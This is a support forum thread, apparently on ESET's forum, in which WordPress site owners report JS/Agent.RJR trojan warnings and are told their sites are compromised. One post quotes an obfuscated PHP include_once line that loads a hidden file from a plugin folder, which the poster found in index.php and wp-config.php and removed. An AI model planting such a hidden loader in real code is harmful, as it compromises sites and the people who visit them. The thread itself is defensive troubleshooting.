kichus 0 Posted January 27 Share Posted January 27 The following WordPress website https://infinitumpartners.com.au/ is blocked by ESET with a JS.Agent.rjr trojan warning. It's only showing for users with ESET installed and loading fine for other website users. We have all the plugin and Core files up-to-date and have Security plugins installed. None of the internal scans showing any malicious codes present. Could you please help us to locate the actual issue. It is critical as it's our business is affected. Thank you so much in advance. Link to comment Share on other sites More sharing options...
Administrators Marcos 5,267 Posted January 27 Administrators Share Posted January 27 The website was compromised and contains the JS malware detected by ESET: https://sitecheck.sucuri.net/results/https/infinitumpartners.com.au kichus 1 Link to comment Share on other sites More sharing options...
kichus 0 Posted January 27 Author Share Posted January 27 Thank you so much for your quick reply. We have seen this report already but are not seeing any traces of this code in the source code nor in DB. Could you please help us how to locate the code and also is it any location specific? Thank you in advance. Link to comment Share on other sites More sharing options...
Administrators Marcos 5,267 Posted January 27 Administrators Share Posted January 27 Unfortunately we can't tell. We don't provide website cleaning and monitoring services nor have access to your web server and database. We merely scan the html code downloaded from the Internet. Link to comment Share on other sites More sharing options...
kichus 0 Posted January 27 Author Share Posted January 27 Thank you. appreciate your time. Link to comment Share on other sites More sharing options...
itman 1,746 Posted January 27 Share Posted January 27 40 minutes ago, Glassertje said: The website is working here. No warning. Same here using Firefox. However, Sucuri detects web site injection. It could be Eset Secure Browser mode for EIS and ESSP is blocking the code injection. It also appears to be an infected WorkPress plug-in, http://infinitumpartners.com.au/wp-content/uploads/2021/11/OTP2-Dark-overlay-60.jpg?id=3552 Link to comment Share on other sites More sharing options...
Administrators Marcos 5,267 Posted January 27 Administrators Share Posted January 27 No detection now either. I recollect that the Sucuri scanner caches results for some time, ie. it's still showing the malicious code even if it has been removed today. Link to comment Share on other sites More sharing options...
MicroS 0 Posted January 29 Share Posted January 29 HI. On my website https://pgmprzemysl.pl ESET detects JS/Agent.RJR. I scanned website on VirtusTotal (https://www.virustotal.com/gui/url/a62fdc26b3fcd54a45a5d1a3e431f154fade046c29fdc57a70438839ec9f92d4) but scanner shows that everything is clean. I found something like $r9 = "//wp\x2dcontent/plug\x69ns/dupl\x69cate\x2dpage/.e6da785f.ccss"; strpos($r9, 't5y'); @include_once /* p2bc */ ($r9); in index.php and wp-config.php files and I removed this, but still JS/Agent.RJR is somewhere detected. What else should I check? Link to comment Share on other sites More sharing options...
Administrators Marcos 5,267 Posted January 29 Administrators Share Posted January 29 2 hours ago, MicroS said: What else should I check? Please refer to https://sitecheck.sucuri.net/results/https/pgmprzemysl.pl. Link to comment Share on other sites More sharing options...
itman 1,746 Posted January 29 Share Posted January 29 24 minutes ago, Marcos said: Please refer to https://sitecheck.sucuri.net/results/https/pgmprzemysl.pl. Sucuri is detecting magneto malware; namely malware.magento_shoplift.38.1. Refer to this article: https://labs.sucuri.net/signatures/sitecheck/malware-magento_shoplift-38-1/ . Link to comment Share on other sites More sharing options...
kandrea 0 Posted January 30 Share Posted January 30 Same here, on uphotelbudapest.com. We try to find and delete the infected files, and now ESET doesn't block website but sucuri still write this: Warning: Malware Detected Infected with malware. Immediate action is required What could we do? Link to comment Share on other sites More sharing options...
Administrators Marcos 5,267 Posted January 30 Administrators Share Posted January 30 8 minutes ago, kandrea said: Same here, on uphotelbudapest.com. We try to find and delete the infected files, and now ESET doesn't block website but sucuri still write this: Warning: Malware Detected Infected with malware. Immediate action is required The website is indeed infected and needs to be cleaned: https://sitecheck.sucuri.net/results/uphotelbudapest.com Link to comment Share on other sites More sharing options...
itman 1,746 Posted January 30 Share Posted January 30 1 hour ago, Marcos said: The website is indeed infected and needs to be cleaned: https://sitecheck.sucuri.net/results/uphotelbudapest.com Looks like the web site is no longer infected. Neither Sucuri or Eset detect any malware. Link to comment Share on other sites More sharing options...
Raxel 0 Posted January 31 Share Posted January 31 Seems I'm getting the warning from https://www.lifelabs.com/ for agent.RJR. A bit scary, as it's a gateway to medical records. Any chance it's not a valid threat? Link to comment Share on other sites More sharing options...
Administrators Marcos 5,267 Posted January 31 Administrators Share Posted January 31 5 hours ago, Raxel said: Seems I'm getting the warning from https://www.lifelabs.com/ for agent.RJR. A bit scary, as it's a gateway to medical records. Any chance it's not a valid threat? The website is indeed infected: Raxel 1 Link to comment Share on other sites More sharing options...
Raxel 0 Posted January 31 Share Posted January 31 7 hours ago, Marcos said: The website is indeed infected: Thank you! That could be a bad one, for sure. Link to comment Share on other sites More sharing options...
AmadeusConcept 0 Posted February 8 Share Posted February 8 Hello, The following WordPress website https://le-blog-des-leaders.com. is blocked by ESET with a JS.Agent.rjr trojan warning. It's only showing for users with ESET installed and loading fine for other website users. We have all the plugin and Core files up-to-date and have Security plugins installed in Wordpress. None of the internal scans showing any malicious codes present. Could you please help us to locate the actual issue. It is critical as it's our business is affected. Thank you so much in advance. Link to comment Share on other sites More sharing options...
Administrators Marcos 5,267 Posted February 8 Administrators Share Posted February 8 12 minutes ago, AmadeusConcept said: is blocked by ESET with a JS.Agent.rjr trojan warning. It's only showing for users with ESET installed and loading fine for other website users. We have all the plugin and Core files up-to-date and have Security plugins installed in Wordpress. The website is indeed infected: https://sitecheck.sucuri.net/results/https/le-blog-des-leaders.com Link to comment Share on other sites More sharing options...
Bruno777 0 Posted February 9 Share Posted February 9 We have the same problem on our website: https:aripar.org. Validated at https://sitecheck.sucuri.net/results/https/aripar.org there is no problem. Only blocked by ESET users Link to comment Share on other sites More sharing options...
Administrators Marcos 5,267 Posted February 10 Administrators Share Posted February 10 8 hours ago, Bruno777 said: We have the same problem on our website: https:aripar.org. Validated at https://sitecheck.sucuri.net/results/https/aripar.org there is no problem. Only blocked by ESET users The website is indeed infected: Link to comment Share on other sites More sharing options...
Recommended Posts